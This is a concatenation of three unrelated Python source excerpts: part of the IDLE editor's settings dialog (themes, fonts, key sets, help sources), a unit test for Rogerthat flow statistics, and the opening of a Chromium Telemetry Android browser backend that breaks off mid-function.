prevColour=self.frameColourSet.cget('bg')
rgbTuplet, colourString = tkColorChooser.askcolor(parent=self,
title='Pick new colour for : '+target,initialcolor=prevColour)
if colourString and (colourString!=prevColour):
#user didn't cancel, and they chose a new colour
if self.themeIsBuiltin.get(): #current theme is a built-in
message=('Your changes will be saved as a new Custom Theme. '+
'Enter a name for your new Custom NavTheme below.')
newTheme=self.GetNewThemeName(message)
if not newTheme: #user cancelled custom theme creation
return
else: #create new custom theme based on previously active theme
self.CreateNewTheme(newTheme)
self.colour.set(colourString)
else: #current theme is user defined
self.colour.set(colourString)
def OnNewColourSet(self):
newColour=self.colour.get()
self.frameColourSet.config(bg=newColour)#set sample
if self.fgHilite.get(): plane='foreground'
else: plane='background'
sampleElement=self.themeElements[self.highlightTarget.get()][0]
self.textHighlightSample.tag_config(sampleElement, **{plane:newColour})
theme=self.customTheme.get()
themeElement=sampleElement+'-'+plane
self.AddChangedItem('highlight',theme,themeElement,newColour)
def GetNewThemeName(self,message):
usedNames=(idleConf.GetSectionList('user','highlight')+
idleConf.GetSectionList('default','highlight'))
newTheme=GetCfgSectionNameDialog(self,'New Custom Theme',
message,usedNames).result
return newTheme
def SaveAsNewTheme(self):
newThemeName=self.GetNewThemeName('New NavTheme Name:')
if newThemeName:
self.CreateNewTheme(newThemeName)
def CreateNewTheme(self,newThemeName):
#creates new custom theme based on the previously active theme,
#and makes the new theme active
if self.themeIsBuiltin.get():
themeType='default'
themeName=self.builtinTheme.get()
else:
themeType='user'
themeName=self.customTheme.get()
newTheme=idleConf.GetThemeDict(themeType,themeName)
#apply any of the old theme's unsaved changes to the new theme
if themeName in self.changedItems['highlight'].keys():
themeChanges=self.changedItems['highlight'][themeName]
for element in themeChanges.keys():
newTheme[element]=themeChanges[element]
#save the new theme
self.SaveNewTheme(newThemeName,newTheme)
#change gui over to the new theme
customThemeList=idleConf.GetSectionList('user','highlight')
customThemeList.sort()
self.optMenuThemeCustom.SetMenu(customThemeList,newThemeName)
self.themeIsBuiltin.set(0)
self.SetThemeType()
def OnListFontButtonRelease(self,event):
font = self.listFontName.get(ANCHOR)
self.fontName.set(font.lower())
self.SetFontSample()
def SetFontSample(self,event=None):
fontName=self.fontName.get()
if self.fontBold.get():
fontWeight=tkFont.BOLD
else:
fontWeight=tkFont.NORMAL
newFont = (fontName, self.fontSize.get(), fontWeight)
self.labelFontSample.config(font=newFont)
self.textHighlightSample.configure(font=newFont)
def SetHighlightTarget(self):
if self.highlightTarget.get()=='Cursor': #bg not possible
self.radioFg.config(state=DISABLED)
self.radioBg.config(state=DISABLED)
self.fgHilite.set(1)
else: #both fg and bg can be set
self.radioFg.config(state=NORMAL)
self.radioBg.config(state=NORMAL)
self.fgHilite.set(1)
self.SetColourSample()
def SetColourSampleBinding(self,*args):
self.SetColourSample()
def SetColourSample(self):
#set the colour smaple area
tag=self.themeElements[self.highlightTarget.get()][0]
if self.fgHilite.get(): plane='foreground'
else: plane='background'
colour=self.textHighlightSample.tag_cget(tag,plane)
self.frameColourSet.config(bg=colour)
def PaintThemeSample(self):
if self.themeIsBuiltin.get(): #a default theme
theme=self.builtinTheme.get()
else: #a user theme
theme=self.customTheme.get()
for elementTitle in self.themeElements.keys():
element=self.themeElements[elementTitle][0]
colours=idleConf.GetHighlight(theme,element)
if element=='cursor': #cursor sample needs special painting
colours['background']=idleConf.GetHighlight(theme,
'normal', fgBg='bg')
#handle any unsaved changes to this theme
if theme in self.changedItems['highlight'].keys():
themeDict=self.changedItems['highlight'][theme]
if element+'-foreground' in themeDict:
colours['foreground']=themeDict[element+'-foreground']
if element+'-background' in themeDict:
colours['background']=themeDict[element+'-background']
self.textHighlightSample.tag_config(element, **colours)
self.SetColourSample()
def HelpSourceSelected(self,event):
self.SetHelpListButtonStates()
def SetHelpListButtonStates(self):
if self.listHelp.size()<1: #no entries in list
self.buttonHelpListEdit.config(state=DISABLED)
self.buttonHelpListRemove.config(state=DISABLED)
else: #there are some entries
if self.listHelp.curselection(): #there currently is a selection
self.buttonHelpListEdit.config(state=NORMAL)
self.buttonHelpListRemove.config(state=NORMAL)
else: #there currently is not a selection
self.buttonHelpListEdit.config(state=DISABLED)
self.buttonHelpListRemove.config(state=DISABLED)
def HelpListItemAdd(self):
helpSource=GetHelpSourceDialog(self,'New Help Source').result
if helpSource:
self.userHelpList.append( (helpSource[0],helpSource[1]) )
self.listHelp.insert(END,helpSource[0])
self.UpdateUserHelpChangedItems()
self.SetHelpListButtonStates()
def HelpListItemEdit(self):
itemIndex=self.listHelp.index(ANCHOR)
helpSource=self.userHelpList[itemIndex]
newHelpSource=GetHelpSourceDialog(self,'Edit Help Source',
menuItem=helpSource[0],filePath=helpSource[1]).result
if (not newHelpSource) or (newHelpSource==helpSource):
return #no changes
self.userHelpList[itemIndex]=newHelpSource
self.listHelp.delete(itemIndex)
self.listHelp.insert(itemIndex,newHelpSource[0])
self.UpdateUserHelpChangedItems()
self.SetHelpListButtonStates()
def HelpListItemRemove(self):
itemIndex=self.listHelp.index(ANCHOR)
del(self.userHelpList[itemIndex])
self.listHelp.delete(itemIndex)
self.UpdateUserHelpChangedItems()
self.SetHelpListButtonStates()
def UpdateUserHelpChangedItems(self):
"Clear and rebuild the HelpFiles section in self.changedItems"
self.changedItems['main']['HelpFiles'] = {}
for num in range(1,len(self.userHelpList)+1):
self.AddChangedItem('main','HelpFiles',str(num),
string.join(self.userHelpList[num-1][:2],';'))
def LoadFontCfg(self):
##base editor font selection list
fonts=list(tkFont.families(self))
fonts.sort()
for font in fonts:
self.listFontName.insert(END,font)
configuredFont=idleConf.GetOption('main','EditorWindow','font',
default='courier')
lc_configuredFont = configuredFont.lower()
self.fontName.set(lc_configuredFont)
lc_fonts = [s.lower() for s in fonts]
if lc_configuredFont in lc_fonts:
currentFontIndex = lc_fonts.index(lc_configuredFont)
self.listFontName.see(currentFontIndex)
self.listFontName.select_set(currentFontIndex)
self.listFontName.select_anchor(currentFontIndex)
##font size dropdown
fontSize=idleConf.GetOption('main','EditorWindow','font-size',
type='int', default='10')
self.optMenuFontSize.SetMenu(('7','8','9','10','11','12','13','14',
'16','18','20','22'),fontSize )
##fontWeight
self.fontBold.set(idleConf.GetOption('main','EditorWindow',
'font-bold',default=0,type='bool'))
##font sample
self.SetFontSample()
def LoadTabCfg(self):
##indent sizes
spaceNum=idleConf.GetOption('main','Indent','num-spaces',
default=4,type='int')
self.spaceNum.set(spaceNum)
def LoadThemeCfg(self):
##current theme type radiobutton
self.themeIsBuiltin.set(idleConf.GetOption('main','Theme','default',
type='bool',default=1))
##currently set theme
currentOption=idleConf.CurrentTheme()
##load available theme option menus
if self.themeIsBuiltin.get(): #default theme selected
itemList=idleConf.GetSectionList('default','highlight')
itemList.sort()
self.optMenuThemeBuiltin.SetMenu(itemList,currentOption)
itemList=idleConf.GetSectionList('user','highlight')
itemList.sort()
if not itemList:
self.radioThemeCustom.config(state=DISABLED)
self.customTheme.set('- no custom themes -')
else:
self.optMenuThemeCustom.SetMenu(itemList,itemList[0])
else: #user theme selected
itemList=idleConf.GetSectionList('user','highlight')
itemList.sort()
self.optMenuThemeCustom.SetMenu(itemList,currentOption)
itemList=idleConf.GetSectionList('default','highlight')
itemList.sort()
self.optMenuThemeBuiltin.SetMenu(itemList,itemList[0])
self.SetThemeType()
##load theme element option menu
themeNames=self.themeElements.keys()
themeNames.sort(key=lambda x: self.themeElements[x][1])
self.optMenuHighlightTarget.SetMenu(themeNames,themeNames[0])
self.PaintThemeSample()
self.SetHighlightTarget()
def LoadKeyCfg(self):
##current keys type radiobutton
self.keysAreBuiltin.set(idleConf.GetOption('main','Keys','default',
type='bool',default=1))
##currently set keys
currentOption=idleConf.CurrentKeys()
##load available keyset option menus
if self.keysAreBuiltin.get(): #default theme selected
itemList=idleConf.GetSectionList('default','keys')
itemList.sort()
self.optMenuKeysBuiltin.SetMenu(itemList,currentOption)
itemList=idleConf.GetSectionList('user','keys')
itemList.sort()
if not itemList:
self.radioKeysCustom.config(state=DISABLED)
self.customKeys.set('- no custom keys -')
else:
self.optMenuKeysCustom.SetMenu(itemList,itemList[0])
else: #user key set selected
itemList=idleConf.GetSectionList('user','keys')
itemList.sort()
self.optMenuKeysCustom.SetMenu(itemList,currentOption)
itemList=idleConf.GetSectionList('default','keys')
itemList.sort()
self.optMenuKeysBuiltin.SetMenu(itemList,itemList[0])
self.SetKeysType()
##load keyset element list
keySetName=idleConf.CurrentKeys()
self.LoadKeysList(keySetName)
def LoadGeneralCfg(self):
#startup state
self.startupEdit.set(idleConf.GetOption('main','General',
'editor-on-startup',default=1,type='bool'))
#autosave state
self.autoSave.set(idleConf.GetOption('main', 'General', 'autosave',
default=0, type='bool'))
#initial window size
self.winWidth.set(idleConf.GetOption('main','EditorWindow','width',
type='int'))
self.winHeight.set(idleConf.GetOption('main','EditorWindow','height',
type='int'))
#initial paragraph reformat size
self.paraWidth.set(idleConf.GetOption('main','FormatParagraph','paragraph',
type='int'))
# default source encoding
self.encoding.set(idleConf.GetOption('main', 'EditorWindow',
'encoding', default='none'))
# additional help sources
self.userHelpList = idleConf.GetAllExtraHelpSourcesList()
for helpItem in self.userHelpList:
self.listHelp.insert(END,helpItem[0])
self.SetHelpListButtonStates()
def LoadConfigs(self):
"""
load configuration from default and user config files and populate
the widgets on the config dialog pages.
"""
### fonts / tabs page
self.LoadFontCfg()
self.LoadTabCfg()
### highlighting page
self.LoadThemeCfg()
### keys page
self.LoadKeyCfg()
### general page
self.LoadGeneralCfg()
def SaveNewKeySet(self,keySetName,keySet):
"""
save a newly created core key set.
keySetName - string, the name of the new key set
keySet - dictionary containing the new key set
"""
if not idleConf.userCfg['keys'].has_section(keySetName):
idleConf.userCfg['keys'].add_section(keySetName)
for event in keySet.keys():
value=keySet[event]
idleConf.userCfg['keys'].SetOption(keySetName,event,value)
def SaveNewTheme(self,themeName,theme):
"""
save a newly created theme.
themeName - string, the name of the new theme
theme - dictionary containing the new theme
"""
if not idleConf.userCfg['highlight'].has_section(themeName):
idleConf.userCfg['highlight'].add_section(themeName)
for element in theme.keys():
value=theme[element]
idleConf.userCfg['highlight'].SetOption(themeName,element,value)
def SetUserValue(self,configType,section,item,value):
if idleConf.defaultCfg[configType].has_option(section,item):
if idleConf.defaultCfg[configType].Get(section,item)==value:
#the setting equals a default setting, remove it from user cfg
return idleConf.userCfg[configType].RemoveOption(section,item)
#if we got here set the option
return idleConf.userCfg[configType].SetOption(section,item,value)
def SaveAllChangedConfigs(self):
"Save configuration changes to the user config file."
idleConf.userCfg['main'].Save()
for configType in self.changedItems.keys():
cfgTypeHasChanges = False
for section in self.changedItems[configType].keys():
if section == 'HelpFiles':
#this section gets completely replaced
idleConf.userCfg['main'].remove_section('HelpFiles')
cfgTypeHasChanges = True
for item in self.changedItems[configType][section].keys():
value = self.changedItems[configType][section][item]
if self.SetUserValue(configType,section,item,value):
cfgTypeHasChanges = True
if cfgTypeHasChanges:
idleConf.userCfg[configType].Save()
for configType in ['keys', 'highlight']:
# save these even if unchanged!
idleConf.userCfg[configType].Save()
self.ResetChangedItems() #clear the changed items dict
def DeactivateCurrentConfig(self):
#Before a config is saved, some cleanup of current
#config must be done - remove the previous keybindings
winInstances=self.parent.instance_dict.keys()
for instance in winInstances:
instance.RemoveKeybindings()
def ActivateConfigChanges(self):
"Dynamically apply configuration changes"
winInstances=self.parent.instance_dict.keys()
for instance in winInstances:
instance.ResetColorizer()
instance.ResetFont()
instance.set_notabs_indentwidth()
instance.ApplyKeybindings()
instance.reset_help_menu_entries()
def Cancel(self):
self.destroy()
def Ok(self):
self.Apply()
self.destroy()
def Apply(self):
self.DeactivateCurrentConfig()
self.SaveAllChangedConfigs()
self.ActivateConfigChanges()
def Help(self):
pass
if __name__ == '__main__':
#test the dialog
root=Tk()
Button(root,text='Dialog',
command=lambda:ConfigDialog(root,'Settings')).pack()
root.instance_dict={}
root.mainloop()
|
|
# -*- coding: utf-8 -*-
# Copyright 2020 Green Valley Belgium NV
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# @@license_version:1.7@@
import datetime
import logging
import mc_unittest
from rogerthat.models import FlowStatistics
from rogerthat.rpc import users
from rogerthat.to.statistics import FlowStatisticsTO
from rogerthat.utils import now
SENT = FlowStatistics.STATUS_SENT
RCVD = FlowStatistics.STATUS_RECEIVED
READ = FlowStatistics.STATUS_READ
ACKED = FlowStatistics.STATUS_ACKED
class FlowStatisticsTestCase(mc_unittest.TestCase):
tag = u'GO'
service_identity_user = users.User(u'[email protected]/+default+')
def test_status_list_names(self):
stats = FlowStatistics(key=FlowStatistics.create_key(self.tag, self.service_identity_user))
stats.labels = list('012345')
self.assertEqual('step_0_read', stats._get_status_list_name(list(), '0', 'read'))
self.assertEqual('step_0_1_2_3_4_sent', stats._get_status_list_name(list('0123'), '4', 'sent'))
self.assertEqual('step_0_1_2_3_4_acked_5', stats._get_status_list_name(list('0123'), '4', 'acked', '5'))
def _create_stats(self):
# Flow used in this unit test:
#
# START
# |
# +-------+
# | id: A |
# +-------+
# _one_| |_two_
# | |
# +-------+ +-------+
# | id: B | | id: C |--------+
# +-------+ +-------+ |
# | |_negative_ | |
# positive | |_three_ |
# | | | |
# +-------+ | | |
# | id: D |---+------+-----+----+----+
# +-------+ |
# +-------+
# | id: E |---------- END
# +-------+
stats = FlowStatistics(key=FlowStatistics.create_key(self.tag, self.service_identity_user))
stats.set_today()
# path: A --one--> B --positive--> D -->rogerthat--> E -->rogerthat--> END
stats.add([], 'A', SENT)
stats.add([], 'A', RCVD)
stats.add([], 'A', READ)
stats.add([], 'A', ACKED, 'one')
stats.add(['A', 'one'], 'B', SENT)
stats.add(['A', 'one'], 'B', RCVD)
stats.add(['A', 'one'], 'B', READ)
stats.add(['A', 'one'], 'B', ACKED, 'positive')
stats.add(['A', 'one', 'B', 'positive'], 'D', SENT)
stats.add(['A', 'one', 'B', 'positive'], 'D', RCVD)
stats.add(['A', 'one', 'B', 'positive'], 'D', READ)
stats.add(['A', 'one', 'B', 'positive'], 'D', ACKED, None)
stats.add(['A', 'one', 'B', 'positive', 'D', None], 'E', SENT)
stats.add(['A', 'one', 'B', 'positive', 'D', None], 'E', RCVD)
stats.add(['A', 'one', 'B', 'positive', 'D', None], 'E', READ)
stats.add(['A', 'one', 'B', 'positive', 'D', None], 'E', ACKED, None)
# path: A --one--> B (sent+rcvd+READ)
stats.add([], 'A', SENT)
stats.add([], 'A', RCVD)
stats.add([], 'A', READ)
stats.add([], 'A', ACKED, 'one')
stats.add(['A', 'one'], 'B', SENT)
stats.add(['A', 'one'], 'B', RCVD)
stats.add(['A', 'one'], 'B', READ)
# path: A --two--> C --rogerthat--> E -->rogerthat--> END
stats.add([], 'A', SENT)
stats.add([], 'A', RCVD)
stats.add([], 'A', READ)
stats.add([], 'A', ACKED, 'two')
stats.add(['A', 'two'], 'C', SENT)
stats.add(['A', 'two'], 'C', RCVD)
stats.add(['A', 'two'], 'C', READ)
stats.add(['A', 'two'], 'C', ACKED, None)
stats.add(['A', 'two', 'C', None], 'E', SENT)
stats.add(['A', 'two', 'C', None], 'E', RCVD)
stats.add(['A', 'two', 'C', None], 'E', READ)
stats.add(['A', 'two', 'C', None], 'E', ACKED, None)
# path: A --two--> C --three--> E (sent+RCVD)
stats.add([], 'A', SENT)
stats.add([], 'A', RCVD)
stats.add([], 'A', READ)
stats.add([], 'A', ACKED, 'two')
stats.add(['A', 'two'], 'C', SENT)
stats.add(['A', 'two'], 'C', RCVD)
stats.add(['A', 'two'], 'C', READ)
stats.add(['A', 'two'], 'C', ACKED, 'three')
stats.add(['A', 'two', 'C', 'three'], 'E', SENT)
stats.add(['A', 'two', 'C', 'three'], 'E', RCVD)
return stats
def test_stats_model(self):
stats = self._create_stats()
self.assertEqual(4, stats.step_0_sent[0])
self.assertEqual(4, stats.step_0_received[0])
self.assertEqual(4, stats.step_0_read[0])
self.assertEqual(4, stats.get_status_list([], 'A', SENT)[0])
self.assertEqual(4, stats.get_status_list([], 'A', RCVD)[0])
self.assertEqual(4, stats.get_status_list([], 'A', READ)[0])
self.assertEqual(2, stats.get_status_list([], 'A', ACKED, 'one')[0])
self.assertEqual(2, stats.get_status_list([], 'A', ACKED, 'two')[0])
self.assertEqual(2, stats.get_status_list(['A', 'one'], 'B', SENT)[0])
self.assertEqual(2, stats.get_status_list(['A', 'one'], 'B', RCVD)[0])
self.assertEqual(2, stats.get_status_list(['A', 'one'], 'B', READ)[0])
self.assertEqual(1, stats.get_status_list(['A', 'one'], 'B', ACKED, 'positive')[0])
self.assertEqual(0, stats.get_status_list(['A', 'one'], 'B', ACKED, 'negative')[0])
self.assertEqual(2, stats.get_status_list(['A', 'two'], 'C', SENT)[0])
self.assertEqual(2, stats.get_status_list(['A', 'two'], 'C', RCVD)[0])
self.assertEqual(2, stats.get_status_list(['A', 'two'], 'C', READ)[0])
self.assertEqual(1, stats.get_status_list(['A', 'two'], 'C', ACKED, 'three')[0])
self.assertEqual(1, stats.get_status_list(['A', 'two'], 'C', ACKED, None)[0])
self.assertEqual(1, stats.get_status_list(['A', 'one', 'B', 'positive'], 'D', SENT)[0])
self.assertEqual(1, stats.get_status_list(['A', 'one', 'B', 'positive'], 'D', RCVD)[0])
self.assertEqual(1, stats.get_status_list(['A', 'one', 'B', 'positive'], 'D', READ)[0])
self.assertEqual(1, stats.get_status_list(['A', 'one', 'B', 'positive'], 'D', ACKED, None)[0])
self.assertEqual(1, stats.get_status_list(['A', 'two', 'C', None], 'E', SENT)[0])
self.assertEqual(1, stats.get_status_list(['A', 'two', 'C', None], 'E', RCVD)[0])
self.assertEqual(1, stats.get_status_list(['A', 'two', 'C', None], 'E', READ)[0])
self.assertEqual(1, stats.get_status_list(['A', 'two', 'C', None], 'E', ACKED, None)[0])
self.assertEqual(1, stats.get_status_list(['A', 'two', 'C', 'three'], 'E', SENT)[0])
self.assertEqual(1, stats.get_status_list(['A', 'two', 'C', 'three'], 'E', RCVD)[0])
self.assertEqual(0, stats.get_status_list(['A', 'two', 'C', 'three'], 'E', READ)[0])
self.assertEqual(0, stats.get_status_list(['A', 'two', 'C', 'three'], 'E', ACKED, None)[0])
self.assertEqual(1, stats.get_status_list(['A', 'one', 'B', 'positive', 'D', None], 'E', SENT)[0])
self.assertEqual(1, stats.get_status_list(['A', 'one', 'B', 'positive', 'D', None], 'E', RCVD)[0])
self.assertEqual(1, stats.get_status_list(['A', 'one', 'B', 'positive', 'D', None], 'E', READ)[0])
self.assertEqual(1, stats.get_status_list(['A', 'one', 'B', 'positive', 'D', None], 'E', ACKED, None)[0])
def test_stats_t_o_with_flows_only(self):
def count(day_stats):
return sum(s.count for s in day_stats)
stats = self._create_stats()
for days in (1, 7, 300): # should all return the same result
logging.info('Days: %s', days)
statsTO = FlowStatisticsTO.from_model(stats,
FlowStatisticsTO.VIEW_FLOWS,
days=days)
self.assertEqual(self.tag, statsTO.tag)
self.assertEqual(0, len(statsTO.steps))
self.assertEqual(1, len(statsTO.flows))
step_a = statsTO.flows[0]
# step_a paths:
# A --one--> B --positive--> D -->rogerthat--> E -->rogerthat--> END
# A --one--> B (sent+rcvd+READ)
# A --two--> C --rogerthat--> E -->rogerthat--> END
# A --two--> C --three--> E (sent+RCVD)
self.assertEqual('A', step_a.step_id)
self.assertTupleEqual((4, 4, 4),
(count(step_a.sent_count), count(step_a.received_count), count(step_a.read_count)))
self.assertEqual(2, len(step_a.buttons))
self.assertEqual(2, count(step_a.get_button('one').acked_count))
self.assertEqual(2, count(step_a.get_button('two').acked_count))
step_a_one_b = step_a.get_button('one').next_steps[0]
# step_a_one_b paths:
# A --one--> B --positive--> D -->rogerthat--> E -->rogerthat--> END
# A --one--> B (sent+rcvd+READ)
self.assertEqual('B', step_a_one_b.step_id)
self.assertTupleEqual((2, 2, 2), (count(step_a_one_b.sent_count),
count(step_a_one_b.received_count),
count(step_a_one_b.read_count)))
self.assertEqual(1, len(step_a_one_b.buttons))
self.assertEqual(1, count(step_a_one_b.get_button('positive').acked_count))
step_a_one_b_pos_d = step_a_one_b.get_button('positive').next_steps[0]
# step_a_one_b_pos_d paths:
# A --one--> B --positive--> D -->rogerthat--> E -->rogerthat--> END
self.assertEqual('D', step_a_one_b_pos_d.step_id)
self.assertTupleEqual((1, 1, 1), (count(step_a_one_b_pos_d.sent_count),
count(step_a_one_b_pos_d.received_count),
count(step_a_one_b_pos_d.read_count)))
self.assertEqual(1, len(step_a_one_b_pos_d.buttons))
self.assertEqual(1, count(step_a_one_b_pos_d.get_button(None).acked_count))
step_a_one_b_pos_d_rt_e = step_a_one_b_pos_d.get_button(None).next_steps[0]
# step_a_one_b_pos_d_rt_e paths:
# A --one--> B --positive--> D -->rogerthat--> E -->rogerthat--> END
self.assertEqual('E', step_a_one_b_pos_d_rt_e.step_id)
self.assertTupleEqual((1, 1, 1), (count(step_a_one_b_pos_d_rt_e.sent_count),
count(step_a_one_b_pos_d_rt_e.received_count),
count(step_a_one_b_pos_d_rt_e.read_count)))
self.assertEqual(1, len(step_a_one_b_pos_d_rt_e.buttons))
self.assertEqual(1, count(step_a_one_b_pos_d_rt_e.get_button(None).acked_count))
self.assertEqual(0, len(step_a_one_b_pos_d_rt_e.get_button(None).next_steps))
step_a_two_c = step_a.get_button('two').next_steps[0]
# step_a_two_c paths:
# A --two--> C --rogerthat--> E -->rogerthat--> END
# A --two--> C --three--> E (sent+RCVD)
self.assertEqual('C', step_a_two_c.step_id)
self.assertTupleEqual((2, 2, 2), (count(step_a_two_c.sent_count),
count(step_a_two_c.received_count),
count(step_a_two_c.read_count)))
self.assertEqual(2, len(step_a_two_c.buttons))
self.assertEqual(1, count(step_a_two_c.get_button(None).acked_count))
self.assertEqual(1, count(step_a_two_c.get_button('three').acked_count))
step_a_two_c_rt_e = step_a_two_c.get_button(None).next_steps[0]
# step_a_two_c_rt_e paths:
# A --two--> C --rogerthat--> E -->rogerthat--> END
self.assertEqual('E', step_a_two_c_rt_e.step_id)
self.assertTupleEqual((1, 1, 1), (count(step_a_two_c_rt_e.sent_count),
count(step_a_two_c_rt_e.received_count),
count(step_a_two_c_rt_e.read_count)))
self.assertEqual(1, len(step_a_two_c_rt_e.buttons))
self.assertEqual(1, count(step_a_two_c_rt_e.get_button(None).acked_count))
step_a_two_c_three_e = step_a_two_c.get_button('three').next_steps[0]
# step_a_two_c_three_e paths:
# A --two--> C --three--> E (sent+RCVD)
self.assertEqual('E', step_a_two_c_three_e.step_id)
self.assertTupleEqual((1, 1, 0), (count(step_a_two_c_three_e.sent_count),
count(step_a_two_c_three_e.received_count),
count(step_a_two_c_three_e.read_count)))
self.assertEqual(0, len(step_a_two_c_three_e.buttons))
def test_stats_t_o_with_steps_only(self):
def count(day_stats):
return sum(s.count for s in day_stats)
stats = self._create_stats()
for days in (1, 7, 300): # should all return the same result
logging.info('Days: %s', days)
statsTO = FlowStatisticsTO.from_model(stats,
FlowStatisticsTO.VIEW_STEPS,
days=days)
self.assertEqual(self.tag, statsTO.tag)
self.assertEqual(0, len(statsTO.flows))
self.assertEqual(5, len(statsTO.steps))
# A --one--> B --positive--> D -->rogerthat--> E -->rogerthat--> END
# A --one--> B (sent+rcvd+READ)
# A --two--> C --rogerthat--> E -->rogerthat--> END
# A --two--> C --three--> E (sent+RCVD)
# step A
step_a = statsTO.get_step('A')
self.assertEqual('A', step_a.step_id)
self.assertTupleEqual((4, 4, 4),
(count(step_a.sent_count), count(step_a.received_count), count(step_a.read_count)))
self.assertEqual(2, len(step_a.buttons))
self.assertEqual(2, count(step_a.get_button('one').acked_count))
self.assertEqual(2, count(step_a.get_button('two').acked_count))
# step B
step_b = statsTO.get_step('B')
self.assertTupleEqual((2, 2, 2),
(count(step_b.sent_count), count(step_b.received_count), count(step_b.read_count)))
self.assertEqual(1, len(step_b.buttons)) # only 'positive' is reached, no entry for 'negative'
self.assertEqual(1, count(step_b.get_button('positive').acked_count))
self.assertIsNone(step_b.get_button('negative'))
# step C
step_c = statsTO.get_step('C')
self.assertTupleEqual((2, 2, 2),
(count(step_c.sent_count), count(step_c.received_count), count(step_c.read_count)))
self.assertEqual(2, len(step_c.buttons))
self.assertEqual(1, count(step_c.get_button('three').acked_count))
self.assertEqual(1, count(step_c.get_button(None).acked_count))
# step D
step_d = statsTO.get_step('D')
self.assertTupleEqual((1, 1, 1),
(count(step_d.sent_count), count(step_d.received_count), count(step_d.read_count)))
self.assertEqual(1, len(step_d.buttons))
self.assertEqual(1, count(step_d.get_button(None).acked_count))
# step E
step_e = statsTO.get_step('E')
self.assertTupleEqual((3, 3, 2),
(count(step_e.sent_count), count(step_e.received_count), count(step_e.read_count)))
self.assertEqual(1, len(step_e.buttons))
self.assertEqual(2, count(step_e.get_button(None).acked_count))
def test_flow_stats_tomorrow(self):
stats = FlowStatistics(key=FlowStatistics.create_key(self.tag, self.service_identity_user))
_now = now()
stats.set_today(datetime.datetime.utcfromtimestamp(_now - 86400).date())
breadcrumbs = list()
current_step_id = 'step_1'
status = FlowStatistics.STATUS_SENT
btn_id = None
stats.add(breadcrumbs, current_step_id, status, btn_id)
self.assertListEqual([1], stats.step_0_sent)
stats.set_today(datetime.datetime.utcfromtimestamp(_now).date())
self.assertListEqual([1, 0], stats.step_0_sent)
stats.add(breadcrumbs, current_step_id, status, btn_id)
self.assertListEqual([1, 1], stats.step_0_sent)
stats.add(breadcrumbs, current_step_id, status, btn_id)
self.assertListEqual([1, 2], stats.step_0_sent)
statsTO = FlowStatisticsTO.from_model(stats,
FlowStatisticsTO.VIEW_STEPS,
days=2)
stepTO = statsTO.get_step(current_step_id)
self.assertEqual(1, stepTO.sent_count[0].count) # yesterday
self.assertEqual(2, stepTO.sent_count[1].count) # today
self.assertLess(datetime.date(year=stepTO.sent_count[0].year, month=stepTO.sent_count[0].month,
day=stepTO.sent_count[0].day),
datetime.date(year=stepTO.sent_count[1].year, month=stepTO.sent_count[1].month,
day=stepTO.sent_count[1].day))
|
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
import subprocess
from telemetry.core import exceptions
from telemetry.internal.platform import android_platform_backend as \
android_platform_backend_module
from telemetry.core import util
from telemetry.internal.backends import android_command_line_backend
from telemetry.internal.backends import browser_backend
from telemetry.internal.backends.chrome import chrome_browser_backend
from telemetry.internal import forwarders
from pylib.device import intent
class AndroidBrowserBackend(chrome_browser_backend.ChromeBrowserBackend):
"""The backend for controlling a browser instance running on Android."""
def __init__(self, android_platform_backend, browser_options,
backend_settings, output_profile_path, extensions_to_load,
target_arch):
assert isinstance(android_platform_backend,
android_platform_backend_module.AndroidPlatformBackend)
super(AndroidBrowserBackend, self).__init__(
android_platform_backend,
supports_tab_control=backend_settings.supports_tab_control,
supports_extensions=False, browser_options=browser_options,
output_profile_path=output_profile_path,
extensions_to_load=extensions_to_load)
self._port_keeper = util.PortKeeper()
# Use the port hold by _port_keeper by default.
self._port = self._port_keeper.port
if len(extensions_to_load) > 0:
raise browser_backend.ExtensionsNotSupportedException(
'Android browser does not support extensions.')
# Initialize fields so that an explosion during init doesn't break in Close.
self._backend_settings = backend_settings
self._target_arch = target_arch
self._saved_sslflag = ''
# TODO(wuhu): Move to network controller backend.
self.platform_backend.InstallTestCa()
# Kill old browser.
self._KillBrowser()
if self.device.HasRoot() or self.device.NeedsSU():
if self.browser_options.profile_dir:
self.platform_backend.PushProfile(
self._backend_settings.package,
self.browser_options.profile_dir)
elif not self.browser_options.dont_override_profile:
self.platform_backend.RemoveProfile(
self._backend_settings.package,
self._backend_settings.profile_ignore_list)
if self.browser_options.netsim:
assert self.platform_backend.use_rndis_forwarder, (
'Netsim requires RNDIS forwarding.')
self.wpr_port_pairs = forwarders.PortPairs(
http=forwarders.PortPair(0, 80),
https=forwarders.PortPair(0, 443),
dns=forwarders.PortPair(0, 53))
# Set the debug app if needed.
self.platform_backend.SetDebugApp(self._backend_settings.package)
@property
def log_file_path(self):
return None
@property
def device(self):
return self.platform_backend.device
def _KillBrowser(self):
if self.device.IsUserBuild():
self.platform_backend.StopApplication(self._backend_settings.package)
else:
self.platform_backend.KillApplication(self._backend_settings.package)
def Start(self):
self.device.RunShellCommand('logcat -c')
if self.browser_options.startup_url:
url = self.browser_options.startup_url
elif self.browser_options.profile_dir:
url = None
else:
# If we have no existing tabs start with a blank page since default
# startup with the NTP can lead to race conditions with Telemetry
url = 'about:blank'
self.platform_backend.DismissCrashDialogIfNeeded()
browser_startup_args = self.GetBrowserStartupArgs()
with android_command_line_backend.SetUpCommandLineFlags(
self.device, self._backend_settings, browser_startup_args):
self.device.StartActivity(
intent.Intent(package=self._backend_settings.package,
activity=self._backend_settings.activity,
action=None, data=url, category=None),
blocking=True)
remote_devtools_port = self._backend_settings.GetDevtoolsRemotePort(
self.device)
try:
# Release reserved port right before forwarding host to device.
self._port_keeper.Release()
assert self._port == self._port_keeper.port, (
'Android browser backend must use reserved port by _port_keeper')
self.platform_backend.ForwardHostToDevice(
self._port, remote_devtools_port)
except Exception:
logging.exception('Failed to forward %s to %s.',
str(self._port), str(remote_devtools_port))
logging.warning('Currently forwarding:')
try:
for line in self.device.adb.ForwardList().splitlines():
logging.warning(' %s', line)
except Exception:
logging.warning('Exception raised while listing forwarded '
'connections.')
logging.warning('Host tcp ports in use:')
try:
